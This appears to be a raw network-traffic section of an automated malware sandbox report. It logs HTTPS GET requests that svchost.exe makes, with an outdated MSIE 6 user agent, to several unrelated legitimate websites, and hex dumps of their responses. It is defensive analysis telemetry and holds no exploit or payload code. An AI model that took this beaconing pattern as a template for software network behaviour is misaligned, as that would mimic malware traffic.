                                                                                                                                                                                                                                                  2023-07-27 19:54:40 UTC8371INData Raw: 65 61 64 79 43 61 6c 6c 62 61 63 6b 28 29 7d 2c 61 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 3f 28 61 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 22 2c 6e 2c 21 31 29 2c 65 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 6c 6f 61 64 22 2c 6e 2c 21 31 29 29 3a 28 65 2e 61 74 74 61 63 68 45 76 65 6e 74 28 22 6f 6e 6c 6f 61 64 22 2c 6e 29 2c 61 2e 61 74 74 61 63 68 45 76 65 6e 74 28 22 6f 6e 72 65 61 64 79 73 74 61 74 65 63 68 61 6e 67 65 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 22 63 6f 6d 70 6c 65 74 65 22 3d 3d 3d 61 2e 72 65 61 64 79 53 74 61 74 65 26 26 74 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 28 29 7d 29 29 2c 28 6e 3d 74 2e 73 6f 75 72 63 65 7c 7c 7b 7d 29 2e 63 6f 6e 63
                                                                                                                                                                                                                                                  Data Ascii: eadyCallback()},a.addEventListener?(a.addEventListener("DOMContentLoaded",n,!1),e.addEventListener("load",n,!1)):(e.attachEvent("onload",n),a.attachEvent("onreadystatechange",function(){"complete"===a.readyState&&t.readyCallback()})),(n=t.source||{}).conc
                                                                                                                                                                                                                                                  2023-07-27 19:54:40 UTC8379INData Raw: 20 30 2e 34 20 30 2e 38 3b 30 2e 32 20 30 2e 38 20 30 2e 34 20 30 2e 38 27 20 63 61 6c 63 4d 6f 64 65 3d 27 73 70 6c 69 6e 65 27 20 20 2f 25 33 45 20 20 20 25 33 43 2f 70 61 74 68 25 33 45 20 20 20 25 33 43 70 61 74 68 20 74 72 61 6e 73 66 6f 72 6d 3d 27 74 72 61 6e 73 6c 61 74 65 28 31 34 29 27 20 64 3d 27 4d 30 20 31 32 20 56 32 30 20 48 34 20 56 31 32 7a 27 25 33 45 20 20 20 20 20 25 33 43 61 6e 69 6d 61 74 65 20 61 74 74 72 69 62 75 74 65 4e 61 6d 65 3d 27 64 27 20 76 61 6c 75 65 73 3d 27 4d 30 20 31 32 20 56 32 30 20 48 34 20 56 31 32 7a 3b 20 4d 30 20 34 20 56 32 38 20 48 34 20 56 34 7a 3b 20 4d 30 20 31 32 20 56 32 30 20 48 34 20 56 31 32 7a 3b 20 4d 30 20 31 32 20 56 32 30 20 48 34 20 56 31 32 7a 27 20 64 75 72 3d 27 31 2e 32 73 27 20 72 65 70 65
                                                                                                                                                                                                                                                  Data Ascii: 0.4 0.8;0.2 0.8 0.4 0.8' calcMode='spline' /%3E %3C/path%3E %3Cpath transform='translate(14)' d='M0 12 V20 H4 V12z'%3E %3Canimate attributeName='d' values='M0 12 V20 H4 V12z; M0 4 V28 H4 V4z; M0 12 V20 H4 V12z; M0 12 V20 H4 V12z' dur='1.2s' repe
                                                                                                                                                                                                                                                  2023-07-27 19:54:40 UTC8387INData Raw: 69 70 74 27 20 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 72 65 76 73 6c 69 64 65 72 2f 70 75 62 6c 69 63 2f 61 73 73 65 74 73 2f 6a 73 2f 6a 71 75 65 72 79 2e 74 68 65 6d 65 70 75 6e 63 68 2e 72 65 76 6f 6c 75 74 69 6f 6e 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 35 2e 34 2e 38 27 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 3e 2f 2f 3c 21 5b 43 44 41 54 41 5b 0a 76 61 72 20 77 63 5f 61 64 64 5f 74 6f 5f 63 61 72 74 5f 70 61 72 61 6d 73 3d 7b 22 61 6a 61 78 5f 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 5c 2f 77 70 2d 61 64 6d 69 6e 5c 2f 61
                                                                                                                                                                                                                                                  Data Ascii: ipt' src='https://dataform.co.uk/wp-content/plugins/revslider/public/assets/js/jquery.themepunch.revolution.min.js?ver=5.4.8'></script><script type='text/javascript'>//<![CDATA[var wc_add_to_cart_params={"ajax_url":"https:\/\/dataform.co.uk\/wp-admin\/a
                                                                                                                                                                                                                                                  2023-07-27 19:54:40 UTC8395INData Raw: 70 73 3a 2f 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 32 33 2f 30 31 2f 44 46 2d 69 63 6f 6e 2d 6c 6f 67 6f 2e 73 76 67 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 37 36 78 37 36 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 32 33 2f 30 31 2f 44 46 2d 69 63 6f 6e 2d 6c 6f 67 6f 2e 73 76 67 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 31 32 30 78 31 32 30 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b
                                                                                                                                                                                                                                                  Data Ascii: ps://dataform.co.uk/wp-content/uploads/2023/01/DF-icon-logo.svg"><link rel="apple-touch-icon" sizes="76x76" href="https://dataform.co.uk/wp-content/uploads/2023/01/DF-icon-logo.svg"><link rel="apple-touch-icon" sizes="120x120" href="https://dataform.co.uk
                                                                                                                                                                                                                                                  2023-07-27 19:54:40 UTC8403INData Raw: 6d 65 6e 75 2d 69 74 65 6d 2d 6f 62 6a 65 63 74 2d 70 61 67 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 35 34 30 34 30 22 3e 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 2f 70 72 69 63 69 6e 67 2f 27 20 64 61 74 61 2d 6c 65 76 65 6c 3d 27 31 27 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 2d 74 65 78 74 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 74 65 78 74 22 3e 50 72 69 63 69 6e 67 3c 2f 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 2f 6c 69 3e 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 20 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 70 6f 73 74 5f 74 79 70 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 6f 62 6a 65 63 74 2d 70 61 67 65 20 6d 65 6e 75 2d 69 74
                                                                                                                                                                                                                                                  Data Ascii: menu-item-object-page menu-item-54040"><a href='https://dataform.co.uk/pricing/' data-level='1'><span class="menu-item-text"><span class="menu-text">Pricing</span></span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-it
                                                                                                                                                                                                                                                  2023-07-27 19:54:40 UTC8411INData Raw: 68 74 74 70 73 3a 2f 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 64 74 2d 74 68 65 37 2f 6a 73 2f 6d 61 69 6e 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 36 2e 30 2e 31 27 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 3e 2f 2f 3c 21 5b 43 44 41 54 41 5b 0a 76 61 72 20 77 70 63 66 37 3d 7b 22 61 70 69 53 65 74 74 69 6e 67 73 22 3a 7b 22 72 6f 6f 74 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 5c 2f 77 70 2d 6a 73 6f 6e 5c 2f 63 6f 6e 74 61 63 74 2d 66 6f 72 6d 2d 37 5c 2f 76 31 22 2c 22 6e 61 6d 65 73 70 61 63 65 22 3a 22 63 6f 6e 74 61 63 74 2d 66 6f 72 6d 2d 37 5c 2f 76 31 22 7d 7d 3b 0a
                                                                                                                                                                                                                                                  Data Ascii: https://dataform.co.uk/wp-content/themes/dt-the7/js/main.min.js?ver=6.6.0.1'></script><script type='text/javascript'>//<![CDATA[var wpcf7={"apiSettings":{"root":"https:\/\/dataform.co.uk\/wp-json\/contact-form-7\/v1","namespace":"contact-form-7\/v1"}};


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                  5192.168.2.450167104.21.48.207443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                  2023-07-27 19:53:36 UTC77OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                  Accept: *
                                                                                                                                                                                                                                                  Accept-Language: en-us
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                  Host: orlyhotel.com
                                                                                                                                                                                                                                                  2023-07-27 19:53:36 UTC78INHTTP/1.1 500 Internal Server Error
                                                                                                                                                                                                                                                  Date: Thu, 27 Jul 2023 19:53:36 GMT
                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  Cache-Control: max-age=0, no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                  Expires: Thu, 27 Jul 2023 19:41:23 GMT
                                                                                                                                                                                                                                                  Content-Language: en
                                                                                                                                                                                                                                                  Last-Modified: Thu, 27 Jul 2023 19:41:23 GMT
                                                                                                                                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                  Vary: Accept-Language
                                                                                                                                                                                                                                                  Set-Cookie: django_language=en; expires=Fri, 26-Jul-2024 19:41:23 GMT; Max-Age=31536000; Path=/
                                                                                                                                                                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=QgaKW5aDO4RKxIivJWZixI3BDSLJLo%2BqZ8EwxJCi7OgBp%2BgS6u3NlYAE20feg7Vt7PAq3KGSD033ryFpqDJuhXy%2FVriRD6iRAjRV%2BRKzpCkp%2FJlRvH%2B9itaWMo86PIp1"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                  CF-RAY: 7ed76df0395e996c-FRA
                                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                  2023-07-27 19:53:36 UTC79INData Raw: 31 62 0d 0a 3c 68 31 3e 53 65 72 76 65 72 20 45 72 72 6f 72 20 28 35 30 30 29 3c 2f 68 31 3e 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: 1b<h1>Server Error (500)</h1>
                                                                                                                                                                                                                                                  2023-07-27 19:53:36 UTC79INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                  6192.168.2.450200172.67.193.133443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                  2023-07-27 19:53:36 UTC77OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                  Accept: *
                                                                                                                                                                                                                                                  Accept-Language: en-us
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                  Host: hyab.com
                                                                                                                                                                                                                                                  2023-07-27 19:53:36 UTC82INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Thu, 27 Jul 2023 19:53:36 GMT
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                  Vary: Accept-Encoding,User-Agent
                                                                                                                                                                                                                                                  Set-Cookie: PHPSESSID=3a81b7877c9c9514e7f79a1e88d0d33b; path=/
                                                                                                                                                                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=MWgIF3X2DomOhKrlZ7kevDSr0l%2BzOVDNWILj2kU2DJz78odNPiYAvl5O28SXZ5gUfRUHbG9gZfcuwflNKY6vB9ubH6OubxXx0CWGFrfIGJ5KhnEro9QcTUBCKA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                  CF-RAY: 7ed76df0ed19366f-FRA
                                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                  2023-07-27 19:53:36 UTC82INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                  7192.168.2.45020494.130.146.206443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                  2023-07-27 19:53:36 UTC77OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                  Accept: *
                                                                                                                                                                                                                                                  Accept-Language: en-us
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                  Host: www.diamir.de
                                                                                                                                                                                                                                                  2023-07-27 19:53:36 UTC77INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                  Date: Thu, 27 Jul 2023 19:53:36 GMT
                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                  Content-Length: 548
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                  2023-07-27 19:53:36 UTC78INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20
                                                                                                                                                                                                                                                  Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                  8192.168.2.450213185.237.66.112443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                  2023-07-27 19:53:36 UTC79OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                  Accept: *
                                                                                                                                                                                                                                                  Accept-Language: en-us
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                  Host: techtrans.de
                                                                                                                                                                                                                                                  2023-07-27 19:53:36 UTC80INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                  Date: Thu, 27 Jul 2023 19:53:36 GMT
                                                                                                                                                                                                                                                  Server: Apache
                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                  Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                                                                                                                                  Expires: 0
                                                                                                                                                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                  Upgrade: h2,h2c
                                                                                                                                                                                                                                                  Connection: Upgrade, close
                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                  2023-07-27 19:53:36 UTC80INData Raw: 32 63 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 27 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 27 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4e 69 6e 6a 61 46 69 72 65 77 61 6c 6c 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 43 6f 6e 74 65 6e 74 2d 54 79 70 65 27 20 63 6f 6e 74 65 6e 74 3d 27 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 27 3e 3c 2f 68 65 61 64 3e 3c 62
                                                                                                                                                                                                                                                  Data Ascii: 2c3<!DOCTYPE HTML PUBLIC '-//IETF//DTD HTML 2.0//EN'><html><head><title>NinjaFirewall 403 Forbidden</title><style>body{font-family:sans-serif;font-size:13px;color:#000;}</style><meta http-equiv='Content-Type' content='text/html; charset=utf-8'></head><b


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                  9192.168.2.450214104.21.66.220443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                  2023-07-27 19:53:36 UTC79OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                  Accept: *
                                                                                                                                                                                                                                                  Accept-Language: en-us
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                  Host: clinicasanluis.com.co
                                                                                                                                                                                                                                                  2023-07-27 19:53:36 UTC114INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Thu, 27 Jul 2023 19:53:36 GMT
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  Expires: Wed, 17 Aug 2005 00:00:00 GMT
                                                                                                                                                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                                  Set-Cookie: d55e479f054c94814cbc10d217aaa990=883b0e9a7a5e8f7be72fa52df7cb1301; path=/; HttpOnly
                                                                                                                                                                                                                                                  Last-Modified: Thu, 27 Jul 2023 19:53:36 GMT
                                                                                                                                                                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=u7GzVJStr21OoezE173e3%2FxJNEQd%2FAA84n9Sh0rEGPMoV5%2FmFx2hVQUYXcb%2FSJbDEpvPdl48gbC%2Fe%2FHAgKRB9s5kzsaRZ6FDLQp%2F08w0Fwflo4r72EzA8%2FsrDFAQyIcjZBYmpRp21k8%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                  CF-RAY: 7ed76df1cf6b2c7b-FRA
                                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                  2023-07-27 19:53:36 UTC115INData Raw: 37 63 34 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 2d 45 53 22 20 64 69 72 3d 22 6c 74 72 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 3c 62 61 73 65 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6c 69 6e 69 63 61 73 61 6e 6c 75 69 73 2e 63 6f 6d 2e 63 6f 2f 22 20
                                                                                                                                                                                                                                                  Data Ascii: 7c46<!DOCTYPE html><html lang="es-ES" dir="ltr"><head><meta name="viewport" content="width=device-width, initial-scale=1.0"><meta http-equiv="X-UA-Compatible" content="IE=edge" /><meta charset="utf-8" /><base href="https://clinicasanluis.com.co/"
                                                                                                                                                                                                                                                  2023-07-27 19:53:36 UTC116INData Raw: 73 79 73 74 65 6d 2f 72 6f 6b 62 6f 78 2f 61 73 73 65 74 73 2f 73 74 79 6c 65 73 2f 72 6f 6b 62 6f 78 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 6d 6f 64 75 6c 65 73 2f 6d 6f 64 5f 70 6f 70 75 70 61 68 6f 6c 69 63 2f 63 73 73 2f 6a 71 75 65 72 79 2e 67 61 66 61 6e 63 79 62 6f 78 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 6d 65 64 69 61 2f 67 61 6e 74 72 79 35 2f 61 73 73 65 74 73 2f 63 73 73 2f 66 6f 6e 74 2d 61 77 65 73 6f 6d 65 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 6d 65 64 69 61 2f 67 61 6e 74 72 79 35 2f
                                                                                                                                                                                                                                                  Data Ascii: system/rokbox/assets/styles/rokbox.css" rel="stylesheet" /><link href="/modules/mod_popupaholic/css/jquery.gafancybox.min.css" rel="stylesheet" /><link href="/media/gantry5/assets/css/font-awesome.min.css" rel="stylesheet" /><link href="/media/gantry5/
                                                                                                                                                                                                                                                  2023-07-27 19:53:36 UTC117INData Raw: 63 6f 72 65 2e 6a 73 3f 39 38 39 64 61 34 36 34 36 61 31 61 30 64 66 66 66 39 61 35 36 38 35 66 62 36 65 65 33 36 64 61 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6d 65 64 69 61 2f 73 79 73 74 65 6d 2f 6a 73 2f 6d 6f 6f 74 6f 6f 6c 73 2d 63 6f 72 65 2e 6a 73 3f 39 38 39 64 61 34 36 34 36 61 31 61 30 64 66 66 66 39 61 35 36 38 35 66 62 36 65 65 33 36 64 61 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6d 65 64 69 61 2f 73 79 73 74 65 6d 2f 6a 73 2f 6d 6f 6f 74 6f 6f 6c 73 2d 6d 6f 72 65 2e 6a 73 3f 39 38 39 64 61 34 36 34 36 61 31 61 30 64 66 66 66 39 61 35 36 38 35 66 62 36 65 65 33 36 64 61 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 70 6c 75 67 69 6e 73
                                                                                                                                                                                                                                                  Data Ascii: core.js?989da4646a1a0dfff9a5685fb6ee36da"></script><script src="/media/system/js/mootools-core.js?989da4646a1a0dfff9a5685fb6ee36da"></script><script src="/media/system/js/mootools-more.js?989da4646a1a0dfff9a5685fb6ee36da"></script><script src="/plugins
                                                                                                                                                                                                                                                  2023-07-27 19:53:36 UTC118INData Raw: 69 6e 74 73 68 69 76 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 6d 65 64 69 61 2f 67 61 6e 74 72 79 35 2f 65 6e 67 69 6e 65 73 2f 6e 75 63 6c 65 75 73 2f 63 73 73 2f 6e 75 63 6c 65 75 73 2d 69 65 39 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 6d 65 64 69 61 2f 67 61 6e 74 72 79 35 2f 61 73 73 65 74 73 2f 6a 73 2f 6d 61 74 63 68 6d 65 64 69 61 2e 70 6f 6c 79 66 69 6c 6c 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d
                                                                                                                                                                                                                                                  Data Ascii: intshiv.min.js"></script> <link rel="stylesheet" href="/media/gantry5/engines/nucleus/css/nucleus-ie9.css" type="text/css"/> <script type="text/javascript" src="/media/gantry5/assets/js/matchmedia.polyfill.js"></script> <![endif]--
